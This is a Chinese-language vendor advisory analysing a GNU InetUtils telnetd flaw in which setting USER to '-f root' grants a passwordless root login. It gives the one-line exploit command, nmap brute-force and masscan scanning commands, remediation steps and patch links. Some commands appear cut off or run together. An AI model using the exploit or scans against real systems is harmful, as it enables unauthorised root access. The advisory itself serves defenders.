【POC已公开】GNU InetUtils telnetd 远程认证绕过漏洞深度分析
【POC已公开】GNU InetUtils telnetd 远程认证绕过漏洞深度分析
作者:让天下没有难做的安全 | 发布时间:2026年1月21日 20:54
原文链接:微信公众号
点击↑蓝字关注我们,获取更多安全风险通告
漏洞编号:暂无CVE(QVD-2026-4408)
公开时间:2026-01-20
影响量级:万级
风险评级:严重(9.8分)
威胁类型:认证权限绕过
POC状态:已公开
EXP状态:已公开
在野利用:暂未发现
危害描述:远程攻击者无需任何密码,仅通过设置恶意环境变量,即可直接以 root 权限登录目标系统,完全绕过身份验证,实现对服务器的完全控制。
━━━━━━━━━━━━━━━━━━
01漏洞详情
影响组件
GNU InetUtils 是由 GNU 项目开发维护的开源网络工具套件,集成了传统的网络管理命令行工具,包括
ftp
、
telnet
、
ping
、
rsh
等常见客户端和服务端程序。
其中
telnetd
是 Telnet 服务守护进程,虽然在现代环境中 SSH 已成为主流,但在内网环境、老旧系统、嵌入式设备中,telnet 服务仍有大量使用。
漏洞原理
漏洞存在于
telnetd
调用
/usr/bin/login
的过程中。
问题根源:
telnetd
服务端在处理来自客户端的
USER
环境变量时直接将该值作为参数传递给
login
程序。
在
telnetd/telnetd.c
中,调用 login 的模板如下:
/* 调用 login 程序的命令行模板 */
PATH_LOGIN " -p -h %h %?u{-f %u}{%U}"
当变量
%U
扩展时,会直接获取
USER
环境变量的值。如果攻击者设置:
USER='-f root'
最终执行的命令变成:
/usr/bin/login -p -h
login
程序的
-f
参数会跳过密码验证,直接以指定用户身份登录。攻击者由此可以无需密码直接获得 root shell。
━━━━━━━━━━━━━━━━━━
02影响范围
受影响版本
GNU InetUtils >= 1.9.3 且 <= 2.7
该漏洞于 2015年3月19日 通过代码提交引入,并在 2015年5月12日 发布的 v1.9.3 版本中生效,已潜伏近 11 年。
默认安装受影响版本的主流发行版包括:
Debian 12 / 13
Ubuntu 24.04+
Kali Linux
Trisquel GNU/Linux
其他基于 Debian/Ubuntu 的发行版
━━━━━━━━━━━━━━━━━━
03为什么大多数环境不受影响
现代 Linux 发行版默认不会安装或启用 telnetd 服务,因此大多数云服务器和生产环境默认不受影响。
NAS BusyBox 有自己的 telnetd 实现,不依赖 GNU InetUtils 的代码不受影响。
GNU InetUtils 的 telnetd 不是 Standalone Daemon,本身不具备监听端口能力,必须配合 inetd/xinetd/systemd socket 才能运行.
即使安装了 telnetd,还需要额外安装并配置 inetd/xinetd,并在配置文件中启用 telnet 服务。
默认不受影响的原因
原因
说明
telnetd 默认不安装
主流发行版默认不安装
inetutils-telnetd
包
inetd/xinetd 默认不启用
即使安装了 telnetd,还需要启用 inetd 或 xinetd 超级服务器运行
SSH 已成为标准
运维几乎全面采用 SSH,telnet 仅在特殊场景使用
云厂商默认配置
腾讯云、阿里云、AWS 等云服务器镜像默认不包含 telnetd
端口默认关闭
安全组/防火墙默认不开放 23 端口
哪些环境可能受影响
内网老旧系统:遗留的内网管理服务器、交换机管理接口
嵌入式/IoT 设备:路由器、NAS、工控设备等可能默认启用 telnet
开发测试环境:为了调试方便临时开启 telnet 后忘记关闭
容器/虚拟机模板:定制的系统镜像中可能包含 telnetd
大学/教育网络:教学环境可能使用 telnet 进行网络实验
━━━━━━━━━━━━━━━━━━
04资产测绘与搜索
本地自查命令
# 检查 telnetd 是否安装dpkg -l | grep -i telnetd
# 检查 telnetd 来源包apt show telnetd 2>/dev/null | grep -E "Source"
# 检查 telnet 端口是否监听netstat -tlnp | grep :23ss -tlnp | grep :23
# 检查 inetd 服务状态systemctl status inetutils-inetdsystemctl status xinetd
# 检查 inetd.conf 中的 telnet 配置grep -v "^#" /etc/inetd.conf | grep telnet
批量扫描(内网资产排查)
# 使用 nmap 扫描内网 telnet 服务nmap -p 23 --open 192.168.1.0/24
# 扫描并获取 banner 信息nmap -p 23 --script telnet-brute,banner 192.168.1.0/24
# 使用 masscan 快速扫描大范围masscan -p23 10.0.0.0/8 --rate=10000
━━━━━━━━━━━━━━━━━━
05漏洞复现
该漏洞的 POC 已完全公开,复现步骤极其简单:
环境搭建(以 Debian/Ubuntu 为例)
# 安装 telnetd 和 telnet 客户端sudo apt-get install inetutils-telnetd telnet
# 启用 telnet 服务sudo sed -i 's/#
# 启动 inetd 服务sudo /etc/init.d/inetutils-inetd start
漏洞利用(一行命令)
# 设置恶意 USER 环境变量并连接USER='-f root' telnet -a localhost
━━━━━━━━━━━━━━━━━━
06处置建议
首要建议:禁用 telnetd
# Debian/Ubuntu 系统 - 停止并禁用服务sudo systemctl stop inetutils-inetdsudo systemctl disable inetutils-inetd
# 或直接卸载sudo apt remove inetutils-telnetd,如果业务确实需要远程访问强烈建议迁移至 SSH。
安全更新
如必须使用 telnet,请应用官方补丁或更新至修复版本:
# Debian/Ubuntusudo apt update && sudo apt upgrade inetutils-telnetd
# RHEL/CentOS/Fedorasudo dnf update inetutils
# 或sudo yum update inetutils
# Arch Linuxsudo pacman -Syu inetutils
━━━━━━━━━━━━━━━━━━
07参考资料
原始安全公告:https://www.openwall.com/lists/oss-security/2026/01/20/2
官方补丁1:https://codeberg.org/inetutils/inetutils/commit/fd702c02497b2f398e739e3119bed0b23dd7aa7b
官方补丁2:https://codeberg.org/inetutils/inetutils/commit/ccba9f748aa8d50a38d7748e2e60362edd6a32cc
漏洞引入提交:https://codeberg.org/inetutils/inetutils/commit/fa3245ac8c288b87139a0da8249d0a408c4dfb87
━━━━━━━━━━━━━━━━━━
08时间线
日期
事件
2015-03-19
漏洞代码被引入
2015-05-12
随 v1.9.3 版本发布
2026-01-19
Kyu Neushwaistein 发现并报告漏洞
2026-01-20
Paul Eggert 发布初始补丁
2026-01-20
Simon Josefsson 发布安全公告
2026-01-21
安多多更新检测规则
━━━━━━━━━━━━━━━━━━
POC有更新,n8n 沙箱逃逸漏洞CVE-2026-0863仍有绕过可能
【安多多预警】AI工作流ComfyUI远程代码执行漏洞(CVE-2025-67303),附检测脚本
安多多-Wiz级多云安全平台,资产真实风险一张图看清,正式开放使用
- 微信客服:anduoduo2025

构建纵深防御体系是个复杂的工程
安多多团队把资深的安全运营经验转为平台工具化,使用 AI+云方能防患未然
访问 https://www.anduoduo.net 即可直接使用